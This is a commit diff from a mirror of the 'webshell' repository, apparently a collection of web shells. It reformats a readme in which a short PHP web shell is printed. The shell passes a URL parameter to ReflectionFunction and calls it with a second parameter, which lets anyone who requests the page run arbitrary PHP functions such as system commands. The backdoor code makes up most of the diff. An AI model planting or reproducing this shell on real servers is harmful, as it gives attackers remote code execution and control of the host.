mirror of
https://github.com/tennc/webshell
synced 2024-11-26 05:00:18 +00:00
update readme.md
This commit is contained in:
parent
635d59bba7
commit
fd8b66c4c7
1 changed files with 2 additions and 5 deletions
|
@ -6,12 +6,9 @@
|
|||
***************************************************
|
||||
code:
|
||||
|
||||
<?php
|
||||
<p>
|
||||
<p><?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
<p>
|
||||
echo $func->invokeArgs(array($_GET[c]));
|
||||
<p>
|
||||
?>
|
||||
?></p>
|
||||
|
||||
***************************************************
|
Loading…
Reference in a new issue